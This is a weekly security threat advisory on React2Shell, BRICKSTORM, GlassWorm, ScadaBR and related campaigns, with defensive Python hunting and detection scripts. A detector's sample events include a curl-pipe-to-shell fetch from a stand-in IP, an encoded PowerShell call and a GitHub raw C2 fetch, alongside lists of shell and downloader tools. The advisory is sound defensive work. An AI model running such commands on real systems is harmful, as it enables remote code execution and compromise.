Servers Under Siege: React2Shell, BRICKSTORM, GlassWorm & ScadaBR—This Week’s Critical Fixes

SISA Weekly Threat Watch – our weekly feature brings you a quick snapshot of the major security vulnerabilities that posed a threat to organizations worldwide. These recurring, actionable threat advisories also provide information and recommendations to help security teams take appropriate action against the latest critical threats.

1. Core-server intrusions move center stage

Attackers are pivoting from end-user endpoints to the heart of enterprise infrastructure—virtualization stacks and internet-exposed Windows servers—where persistence buys long dwell time and broad reach. Tactics blend stealthy persistence, dead-drop C2, and identity abuse to quietly expand control.

  • BRICKSTORM backdoor on VMware vCenter — China-linked actors compromised DMZ web servers, moved laterally into vSphere/vCenter, dropped the Go-based BRICKSTORM implant on ESXi/vCenter hosts, spun up rogue VMs, stole VM snapshots and AD data, and abused ADFS signing keys for long-term access, using encrypted HTTPS/WebSocket/DoH C2 and self-healing persistence.

  • PassiveNeuron SQL-path espionage — Opportunistic hits on internet-exposed Windows Server/SQL environments using NeuralExecutor/Neursite loaders, Cobalt Strike, GitHub dead-drops, and Phantom DLL hijacking to persist outside typical autoruns while focusing on government/industrial/financial targets.

2. App-layer RCE goes mass-exploitation

Framework-level flaws that are exploitable in default configurations are being weaponized within hours of disclosure, forcing emergency patch cycles and retroactive compromise assessments; patching alone isn’t enough when the window of exposure is already behind you.

  • React2Shell zero-day (CVE-2025-55182) — Insecure deserialization in React Server Components’ Flight protocol enables unauthenticated server-side JS execution on many React/Next.js apps; active, hands-on-keyboard exploitation by China-nexus clusters with public PoCs in circulation.

  • WordPress plugin criticals — King Addons for Elementor privilege escalation lets unauthenticated users self-assign the administrator role via crafted admin-ajax.php requests; Advanced Custom Fields: Extended RCE abuses call_user_func_array() for unauthenticated code execution—both already exploited in the wild.

3. APT Tradecraft: DNS/AitM & Long-Haul Loaders

State-aligned groups are shifting from simple phish to infrastructure-level hijack and multi-year, low-noise loaders.

  • PlushDaemon EdgeStepper — Go backdoor on edge devices hijacks DNS to reroute software updates, delivering LittleDaemon → DaemonicLogistics → SlowStepper for espionage across semiconductor, manufacturing, and academia.

  • APT24 “BadAudio” — Heavily-obfuscated DLL loader delivered via watering holes, a Taiwanese JS supply-chain breach, and themed spearphish; AES-encrypted beacons and in-memory payloads (incl. Cobalt Strike) with persistently low AV detection.

4. Developer supply chain under fire (again)

The dev toolchain remains a high-leverage entry point: marketplace trust, auto-updates, and wide blast radius make it ideal for stealthy spread and credential theft.

  • GlassWorm returns in VS Code/Open VSX — 24 malicious extensions impersonating popular tools ship Rust implants, resolve C2 addresses via Solana blockchain transactions (and even Google Calendar events), then use stolen credentials to backdoor repositories and republish trojanized packages for worm-like propagation across Windows/macOS developer fleets.

5. ICS/OT web layers get picked off

Legacy web panels and default creds on HMI/SCADA are being abused for high-visibility defacement and low-effort disruption, while quietly degrading operator visibility.

  • OpenPLC ScadaBR XSS (CVE-2021-26829) actively exploited — TwoNet hacktivists logged in with default credentials, injected JS via system_settings.shtm, defaced the HMI, and disabled logs/alerts; CISA added the flaw to KEV amid broader ICS probing and region-focused scans.

Proactive Steps for the Week

Patch/disable now (highest priority)

  • React/Next.js: apply vendor fixes for React2Shell; if patching is delayed, temporarily disable RSC Flight endpoints and add WAF rules to block malformed Flight payloads as a stopgap only. Because public PoCs are circulating, treat any internet-facing instance that ran unpatched as potentially compromised and review for webshells, unexpected child processes of the Node runtime, and outbound connections from the app server.

  • WordPress: update King Addons to 51.1.35 or later and ACF: Extended to 0.9.2 or later; audit for rogue administrator accounts, unexpected PHP files, and recent admin-ajax.php abuse in web server logs.

  • VMware stack: baseline vCenter/ESXi (installed packages, services, running VMs, local accounts); hunt for unknown ELF/Go binaries, long-lived outbound HTTPS/WebSocket/DoH sessions from management hosts, rogue VMs/snapshots, and ADFS key export events.
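The egress part of the vCenter/ESXi hunt above, and the DoH-at-egress point under hardening, can be turned into a small script. The following is an added example written for this advisory, not a SISA or VMware tool: it evaluates Zeek conn.log-style connection records from management hosts and flags long-lived external TLS/WebSocket sessions, DNS-over-HTTPS to public resolvers, and low-jitter periodic beaconing to a single external destination. The host names, internal ranges, resolver list, thresholds and sample records are all assumptions constructed for the example.

```python
"""Hunt management-host egress for BRICKSTORM-style C2 patterns.

Added example: flags (1) long-lived outbound TLS/WebSocket sessions from
vCenter/ESXi hosts, (2) DNS-over-HTTPS to public resolvers (management hosts
should only talk to internal DNS), (3) periodic, low-jitter beaconing.
Host names, ranges, resolver IPs and thresholds are assumptions.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network
from statistics import mean, pstdev

# Assumption: the virtualization management plane runs on these hosts.
MGMT_HOSTS = {"vcenter01", "esxi01", "esxi02"}
# Assumption: RFC 1918 space is internal; anything else counts as external.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
                 ip_network("192.168.0.0/16")]
# Well-known public DoH resolvers (example list; extend from your own intel).
PUBLIC_DOH = {"1.1.1.1", "1.0.0.1", "8.8.8.8", "8.8.4.4", "9.9.9.9"}
LONG_LIVED_S = 3600     # a TLS session open > 1 h from a mgmt host is unusual
BEACON_MIN_HITS = 5     # minimum connections before judging periodicity
BEACON_MAX_CV = 0.15    # max coefficient of variation of inter-arrival gaps

# Constructed sample records: (ts, src_host, dst_ip, dst_port, duration_s)
SAMPLE_CONNS = [
    (1000, "vcenter01", "10.0.5.20", 443, 12.0),       # internal, benign
    (1010, "esxi01", "203.0.113.7", 443, 7200.0),      # long-lived external TLS
    (1020, "vcenter01", "8.8.8.8", 443, 1.2),          # DoH to a public resolver
    (2000, "esxi02", "198.51.100.9", 443, 2.0),        # beacon, 300 s cadence
    (2300, "esxi02", "198.51.100.9", 443, 2.1),
    (2600, "esxi02", "198.51.100.9", 443, 1.9),
    (2900, "esxi02", "198.51.100.9", 443, 2.0),
    (3200, "esxi02", "198.51.100.9", 443, 2.2),
    (3300, "fileserver", "203.0.113.7", 443, 9000.0),  # not a mgmt host, ignored
]


def is_external(ip: str) -> bool:
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def hunt(conns):
    """Return a list of (finding, src_host, dst_ip) tuples."""
    findings = []
    by_pair = defaultdict(list)  # (src, dst) -> connection timestamps
    for ts, src, dst, port, dur in conns:
        if src not in MGMT_HOSTS:
            continue
        if dst in PUBLIC_DOH and port == 443:
            findings.append(("doh_egress", src, dst))
        if is_external(dst) and port == 443 and dur > LONG_LIVED_S:
            findings.append(("long_lived_tls", src, dst))
        if is_external(dst):
            by_pair[(src, dst)].append(ts)
    # Periodicity: many connections to one destination with near-constant gaps.
    for (src, dst), stamps in by_pair.items():
        if len(stamps) < BEACON_MIN_HITS:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else 0.0
        if cv <= BEACON_MAX_CV:
            findings.append(("periodic_beacon", src, dst))
    return findings


if __name__ == "__main__":
    for kind, src, dst in hunt(SAMPLE_CONNS):
        print(f"{kind:16} {src:10} -> {dst}")
```

Tune the thresholds before running this against real data: vendor support tunnels and update services can hold long sessions and should be allow-listed by destination, and sleep jitter in real implants means the beacon check should be read as a prioritisation signal rather than a verdict. DoH from a management host is worth an alert on policy grounds alone, which is why blocking unsanctioned DoH at egress appears in the hardening list.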

Hunt and contain (next 72 hours)

  • Windows Server/SQL: search for DLLs planted in phantom load paths (names a trusted process probes for but that normally do not exist) under System32 and service directories, suspicious SQL activity (e.g., xp_cmdshell use), Cobalt Strike beacons, and GitHub raw-content fetches originating from servers.

  • Developer endpoints/CI: enumerate and remove the listed VS Code/Open VSX extensions; rotate GitHub/npm tokens, enforce MFA, and scan for Rust module loads from extension directories.

  • ICS/HMI: enforce password changes off defaults, segment panels, add WAF XSS rules for ScadaBR, and enable audit alerts for UI/file changes and log tampering.
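For the developer-endpoint step above, the enumeration can be scripted against the extension directories VS Code and VSCodium use on disk, which also gives you the allow-list mechanism called for in the hardening section. The script below is an added example, not from the advisory or from any marketplace tooling: it reads each extension's package.json, flags anything not on an approved list, anything that activates on every startup, and anything that ships native binaries (GlassWorm's payloads were Rust implants). The allow-list, the look-alike extension ID and the sample directory tree are constructed for the example and do not name real malicious extensions.

```python
"""Audit a VS Code / VSCodium extensions directory against an allow-list.

Added example: walks <extensions_dir>/<publisher.name-version>/package.json
and reports extensions that are not approved, activate on every startup
("*" in activationEvents), or carry native binaries. Allow-list, sample tree
and extension IDs are constructed for the example.
"""
import json
import tempfile
from pathlib import Path

# Assumption: the organisation's approved <publisher>.<name> IDs.
ALLOW_LIST = {"ms-python.python", "esbenp.prettier-vscode"}
NATIVE_SUFFIXES = {".node", ".dll", ".so", ".dylib", ".exe"}


def default_dirs():
    """Default on-disk extension roots for VS Code and VSCodium/Open VSX clients."""
    home = Path.home()
    return [home / ".vscode" / "extensions", home / ".vscode-oss" / "extensions"]


def audit(ext_dir: Path):
    """Return {extension_id: [reasons]} for every extension that needs review."""
    flagged = {}
    for manifest in sorted(ext_dir.glob("*/package.json")):
        try:
            meta = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            flagged[manifest.parent.name] = ["unreadable package.json"]
            continue
        ext_id = f"{meta.get('publisher', '?')}.{meta.get('name', '?')}".lower()
        reasons = []
        if ext_id not in ALLOW_LIST:
            reasons.append("not on allow-list")
        if "*" in meta.get("activationEvents", []):
            reasons.append("activates on every startup")
        natives = sorted(p.name for p in manifest.parent.rglob("*")
                         if p.suffix.lower() in NATIVE_SUFFIXES)
        if natives:
            reasons.append("ships native binaries: " + ", ".join(natives))
        if reasons:
            flagged[ext_id] = reasons
    return flagged


def build_sample_tree(root: Path) -> Path:
    """Constructed sample: one approved extension, one typo-squat with a native module."""
    good = root / "ms-python.python-2024.1.0"
    good.mkdir(parents=True)
    (good / "package.json").write_text(json.dumps(
        {"publisher": "ms-python", "name": "python",
         "activationEvents": ["onLanguage:python"]}))
    bad = root / "ms-pythn.python-tools-1.0.3"  # hypothetical look-alike ID
    (bad / "node_modules" / "helper").mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps(
        {"publisher": "ms-pythn", "name": "python-tools", "activationEvents": ["*"]}))
    # Fake native module standing in for a bundled implant (ELF magic only).
    (bad / "node_modules" / "helper" / "svc.node").write_bytes(b"\x7fELF")
    return root


def run_sample():
    """Build the constructed tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit(build_sample_tree(Path(tmp)))


if __name__ == "__main__":
    print("sample:", run_sample())
    for d in default_dirs():
        if d.is_dir():
            for ext_id, reasons in audit(d).items():
                print(f"{d}: {ext_id}: {'; '.join(reasons)}")
```

A native module inside an extension is not proof of compromise (many legitimate extensions bundle them), so treat that reason as a prompt to check the publisher and the marketplace listing rather than as a verdict; the allow-list miss is the actionable signal, and re-review on marketplace updates means re-running this after every extension upgrade.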

Hardening to start this sprint

  • Restrict admin access to jump hosts/VPN with MFA; block unsanctioned DoH at egress.

  • Implement signed extensions/allow-lists for IDEs; require re-review on marketplace updates.

  • For SQL Server, disable unused features (e.g., xp_cmdshell), enforce TLS, remove direct internet exposure of the database port wherever possible, and monitor for anomalous administrative logins from external addresses.

  • Add detections for: React RSC anomalies, unexpected node/interpreter spawns under web services, vCenter config changes outside change windows, and cookie- or calendar-based dead-drop patterns.
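Two of the detections listed above, unexpected interpreter spawns under web services and xp_cmdshell activity, plus the GitHub raw fetches from the Windows Server/SQL hunt, can be expressed as rules over process-creation telemetry. The code below is an added example written for this advisory rather than a vendor rule set: it evaluates Sysmon Event ID 1 / auditd EXECVE-style records (host, parent image, image, command line) and emits an alert for a web-server parent spawning a shell, interpreter or downloader, for sqlservr.exe spawning a command shell, and for a server process fetching from GitHub raw content. The parent and child process lists, the expected-children exceptions and the sample events are assumptions constructed for the example.

```python
"""Detect web-service and SQL Server post-exploitation process spawns.

Added example: three rules over process-creation events from servers.
  web_service_spawned_interpreter  web runtime -> shell/interpreter/downloader
  xp_cmdshell_spawn                sqlservr.exe -> cmd.exe / powershell.exe
  github_raw_fetch                 downloader invoked with a GitHub raw URL
Process lists, exceptions and sample events are assumptions.
"""

WEB_PARENTS = {"node", "node.exe", "w3wp.exe", "php-fpm", "httpd", "nginx",
               "java", "java.exe"}
SHELLS_AND_DOWNLOADERS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe",
                          "pwsh", "pwsh.exe", "python", "python3", "python.exe",
                          "perl", "curl", "curl.exe", "wget", "wget.exe",
                          "certutil.exe", "bitsadmin.exe"}
SQL_SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Assumption: children a web runtime legitimately spawns in this environment.
EXPECTED_CHILDREN = {"node": {"git"}, "node.exe": {"git.exe"}}
GITHUB_RAW_MARKERS = ("raw.githubusercontent.com", "gist.githubusercontent.com",
                      "github.com/")

# Constructed sample events; all hosts are servers.
SAMPLE_EVENTS = [
    {"host": "web01", "parent": "/usr/bin/node", "image": "/usr/bin/node",
     "cmd": "node worker.js"},
    {"host": "web01", "parent": "/usr/bin/node", "image": "/bin/sh",
     "cmd": "sh -c 'id; curl http://203.0.113.7/s | sh'"},
    {"host": "web02", "parent": "C:\\Program Files\\nodejs\\node.exe",
     "image": "C:\\Windows\\System32\\cmd.exe", "cmd": "cmd.exe /c whoami"},
    {"host": "sql01",
     "parent": "C:\\Program Files\\Microsoft SQL Server\\MSSQL16.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmd": "cmd.exe /c powershell -enc AAAA"},
    {"host": "sql01", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\curl.exe",
     "cmd": "curl.exe -s https://raw.githubusercontent.com/example/repo/main/c2.txt"},
    {"host": "sql01", "parent": "C:\\Windows\\System32\\services.exe",
     "image": "C:\\Program Files\\Microsoft SQL Server\\MSSQL16.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe",
     "cmd": "sqlservr.exe -sMSSQLSERVER"},
]


def basename(path: str) -> str:
    """Lower-cased final path component for both Windows and POSIX paths."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events):
    """Return a list of (rule, host, detail) alerts."""
    alerts = []
    for ev in events:
        parent, child = basename(ev["parent"]), basename(ev["image"])
        cmd = ev.get("cmd", "")
        if (parent in WEB_PARENTS and child in SHELLS_AND_DOWNLOADERS
                and child not in EXPECTED_CHILDREN.get(parent, set())):
            alerts.append(("web_service_spawned_interpreter", ev["host"],
                           f"{parent} -> {child}"))
        if parent == "sqlservr.exe" and child in SQL_SHELL_CHILDREN:
            alerts.append(("xp_cmdshell_spawn", ev["host"], f"{parent} -> {child}"))
        if (child in SHELLS_AND_DOWNLOADERS
                and any(m in cmd.lower() for m in GITHUB_RAW_MARKERS)):
            alerts.append(("github_raw_fetch", ev["host"], cmd))
    return alerts


if __name__ == "__main__":
    for rule, host, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:32} {host:6} {detail}")
```

The xp_cmdshell rule works because SQL Server runs xp_cmdshell through a cmd.exe child of sqlservr.exe, so the parent/child pair is visible in process telemetry even when SQL audit logging is off; if SQL Agent jobs or maintenance scripts legitimately shell out in your environment, add them to an exception list rather than loosening the rule. The GitHub rule should be scoped to server hosts, since developer workstations fetch from GitHub constantly.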

To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.
